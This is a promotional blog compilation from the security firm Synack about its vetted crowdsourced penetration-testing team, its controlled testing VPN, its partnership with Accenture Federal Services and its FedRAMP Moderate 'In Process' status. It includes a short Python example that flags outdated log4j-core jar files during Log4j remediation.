One of the strengths of the SRT comes from its diverse community; our SRT members are top researchers in their respective fields—academia, government and the private sector. They hail from countries all around the world, including the United States, the United Kingdom, Canada, Australia and New Zealand. Human ingenuity takes many forms, and it’s that richness of difference that makes the SRT able to take on a seemingly endless list of security testing tasks.
Before joining the team, each prospective SRT member must first complete a 5-step vetting process that is designed to assess skill and trustworthiness. Historically, less than 10% of applicants have been accepted into the SRT, as we strive to add only those trusted individuals who will contribute positive results without excess noise to the platform. While our process loosely resembles bug bounty models, Synack sets the bar higher.
Synack’s community team monitors SRT members’ online behavior and removes members immediately when required. Synack maintains a common standard and reward level across the SRT, allowing our clients to benefit from the clear understanding and agreement between SRT members and Synack for what constitutes a thorough report deserving of a high reward. SRT members have collectively earned millions of dollars and have found thousands of vulnerabilities for Synack clients, including the U.S. Army and Air Force, the Centers for Disease Control and Prevention and the Internal Revenue Service.
Baking “Trust But Verify” Into the Process
The Synack Platform ultimately powers our researchers. Synack works closely with clients to accurately scope testing and instruct them on how to use the Platform effectively.
The Platform is also where SRT researchers submit findings to be triaged by our Vulnerability Operations team. VulnOps ensures that quality results are delivered to the client in a variety of formats (e.g. easily digestible reports, integration of data into existing security software). Clients are also able to communicate directly with researchers for questions or follow up.
All SRT traffic goes through Synack’s VPN LaunchPoint to provide control and assurance around pentesting traffic. LaunchPoint focuses penetration testing traffic through one source, pauses or stops testing at the push of a button, provides complete visibility into the researcher’s testing activity with full packet capture, time-stamps traffic for auditing purposes and allows for data cleansing and deletion of sensitive customer data by Synack after it is no longer needed for testing.
Synack Works with Top Government and Private Sector Clients
Setting the bar higher allows Synack to work with clients who need additional assurance. Recently, we completed the requirements to achieve our FedRAMP Moderate “In Process” designation, which allows us to work with almost any U.S. federal agency. In past years, we’ve participated in Hack the Pentagon and several public hacking competitions for U.S. defense agencies, such as a 2019 effort in Las Vegas to find critical weaknesses in the F-15 fighter jet.
Malicious actors don’t need any clearance to hack into systems. Synack takes the task of combating those bad actors seriously, and our teams, from the Red Team to VulnOps, have worked to ensure that our clients receive vulnerability reports with actionable, secure information. We continue to innovate in the security testing and pentesting-as-a-service industry, ensuring privacy and security for all our clients while providing clear visibility into all testing through our trusted technology.
Interested in our work with the public sector? Click here.
Synack works with innovative government security leaders who are responsible for protecting their organizations by finding and remediating exploitable vulnerabilities before they can be used by an attacker. In this effort we have formed trusted partnerships with federal agencies and their consultants, helping them to achieve mission-critical goals safely. Synack has worked with more than 30 federal agencies to quickly identify known and unknown vulnerabilities before attackers can take advantage of them. And Synack has received Moderate “In Process” status from the Federal Risk and Authorization Management Program (FedRAMP), underscoring Synack’s commitment to stringent data and compliance standards. This work is especially important in light of President Biden’s recent cybersecurity memorandum laying out steps that federal agencies need to take to protect the nation’s critical assets – its networks and data.
An example of such recent and essential work brings us back to December 12, 2021, when the U.S. Department of Homeland Security (DHS) issued a warning about the Log4j vulnerability. Federal agencies were required to identify whether they had the vulnerability and remediate it by December 24th — an effort that could otherwise take days or weeks. Synack’s SWAT team was able to identify the vulnerability (and its variants) for agencies in a matter of hours. One Synack federal customer was able to successfully test more than 520 active hosts and 200 in a 24-hour period for this critical vulnerability.
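The kind of rapid triage agencies raced to perform can be sketched in a few lines of filename-based scanning. This is an illustrative check only, not Synack’s actual method, and a real sweep must also inspect shaded and nested jars rather than rely on names alone:

```python
import re
from pathlib import Path

# Log4Shell (CVE-2021-44228) affected log4j-core 2.0-beta9 through 2.14.1;
# follow-on CVEs pushed the generally safe floor on the 2.x line to 2.17.x.
SAFE_FLOOR = (2, 17, 0)
JAR_PATTERN = re.compile(r"log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$")

def flag_vulnerable_jars(root: str) -> list:
    """Walk a directory tree and flag log4j-core jars below the safe floor."""
    hits = []
    for jar in Path(root).rglob("log4j-core-*.jar"):
        match = JAR_PATTERN.search(jar.name)
        if match and tuple(map(int, match.groups())) < SAFE_FLOOR:
            hits.append(str(jar))
    return hits
```

A check like this covers only the easy cases; vulnerable classes bundled inside fat jars or renamed artifacts require deeper inspection, which is why hands-on testing found variants that automated scans missed.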
Accenture Federal Services (Accenture) is a premier consultant to cabinet-level federal agencies, providing end-to-end cybersecurity services and skilled professionals to help agencies innovate safely and build cyber resilience. In partnering with Synack, Accenture brings to bear the power and speed of the Synack platform to help federal agencies be more proactive with their cybersecurity practices. Working together, Synack and Accenture are delivering innovative solutions, including continuous security testing, which empowers agencies to quickly detect and remediate vulnerabilities before they can be exploited. Synack’s comprehensive security testing complements Accenture’s hands-on consultative engagements, supporting agencies as they integrate security into their organizations.
Proactive components of security programs are critical and yet often hard to perform at scale, primarily due to the cyber talent gap. Together, Accenture and Synack are successfully building proactive measures into agency-wide security programs with clear impact and staying power. We are regularly delivering on unprecedented find-to-fix vulnerability cycles, Vulnerability Disclosure Programs (VDPs) under Binding Operational Directive 20-01, and testing in pre-production environments.
The Synack & Accenture Federal Partnership Enables Security Teams with On-Demand Security Testing
Penetration testing at scale
Nimble responsiveness to time-sensitive customer needs
Continuous security posture testing
Evaluation of high-value assets and testing of internal, external, and cloud assets
Policy and compliance audits
The Synack/Accenture partnership is a strong example of how Synack can provide a higher level of pentesting and security evaluation to government customers with varying levels of security expertise. In-house pentesting is difficult to scale, but Synack’s community of the world’s most skilled and trusted ethical researchers delivers effective, efficient, and actionable security testing on-demand and at scale, allowing security teams to focus on the vulnerabilities that matter most.
Enabling Continuous Penetration Testing at Scale for Federal Agencies
Synack has paved the way as a trusted leader in cybersecurity testing and vulnerability disclosure management. Now, Synack is raising the bar even higher by achieving the FedRAMP Moderate “In Process” milestone, helping to make federal data secure. Synack’s sponsoring agency for FedRAMP is the U.S. Department of Health & Human Services (HHS). Synack’s Discover, Certify, Synack365 and Synack Campaigns offerings are now available on the FedRAMP Marketplace.
FedRAMP and Synack
The Federal Risk and Authorization Management Program (FedRAMP) is a U.S. government-wide program that provides a standardized approach to security assessment, authorization and monitoring for cloud services. As part of its FedRAMP designation, Synack will be implementing 325 controls across 17 NIST 800-53 control families. Not only will this greatly enhance current protections for federal customer data, but it will also provide assurance to all our customers that Synack is reducing risk and providing government-grade data privacy protections.
The Growing Importance of Security Testing
Organizations spend an average of $1.3M per year responding to erroneous or inaccurate alerts, and while the average company receives 1 million alerts per year, only 4% are ever investigated. During a time when attacks are at an all-time high, it’s more important than ever to have security protections in place with results you can trust. Synack’s new FedRAMP Moderate “In Process” designation underlines the company’s commitment to providing a high level of security across the board and quality results, speeding vulnerability management efforts and reducing risks to government assets.
The 5 Benefits of Synack FedRAMP for Federal Agencies
Through partnering with Synack and leveraging Synack’s FedRAMP Moderate “In Process” designation, agencies can be reassured that their data is in safe hands. Synack will now provide the following benefits to federal agencies:
Easy and quick procurement: Saves agencies time and effort, and 30 percent or more in costs, by allowing them to leverage existing assessments and authorizations under FedRAMP.
Risk mitigation: A security assessment at the Moderate level contains three times the security controls of an ISO 27001 certification. These protections provide assurance that Synack handles your data and the pentesting process with extra care.
FISMA compliance: Agencies are required to maintain FISMA compliance and FedRAMP provides a more affordable path to FISMA compliance. Many of the NIST 800-53 controls in FedRAMP overlap with those in FISMA, which means you don’t have to spend extra resources implementing these controls with vendors during an annual audit.
Data security: Unlike FedRAMP LI-SaaS, FedRAMP Moderate is designed for agencies handling both external and internal applications. Additionally, if an agency works with sensitive data, it should be working with providers at the Moderate level.
Continuous monitoring: To comply with FedRAMP, agencies and software providers must continuously monitor certain controls and undergo an annual assessment, which ensures agencies are always working with a fully compliant testing provider.
Why the FedRAMP Designation Matters
Synack is the only crowdsourced security company that has achieved the “In Process” status at the Moderate level. FedRAMP levels vary across the number of controls required, the sensitivity of the information, and the network access for government applications. Cloud service providers (CSPs) are granted authorizations at four impact levels: LI-SaaS (Low Impact Software-as-a-Service), Low, Moderate and High.
The stark difference in the controls required is particularly apparent when you compare the 17 NIST 800-53 control families side by side. There are drastically more requirements for certain control families like access control, identification and authentication, and system and information integrity. These additional controls that Synack is adhering to ensure that your government assets—whether external or internal—stay secure.
If you’d like to learn more about Synack’s FedRAMP environment or solutions for your Federal SOC, click here to book a meeting with a Synack representative.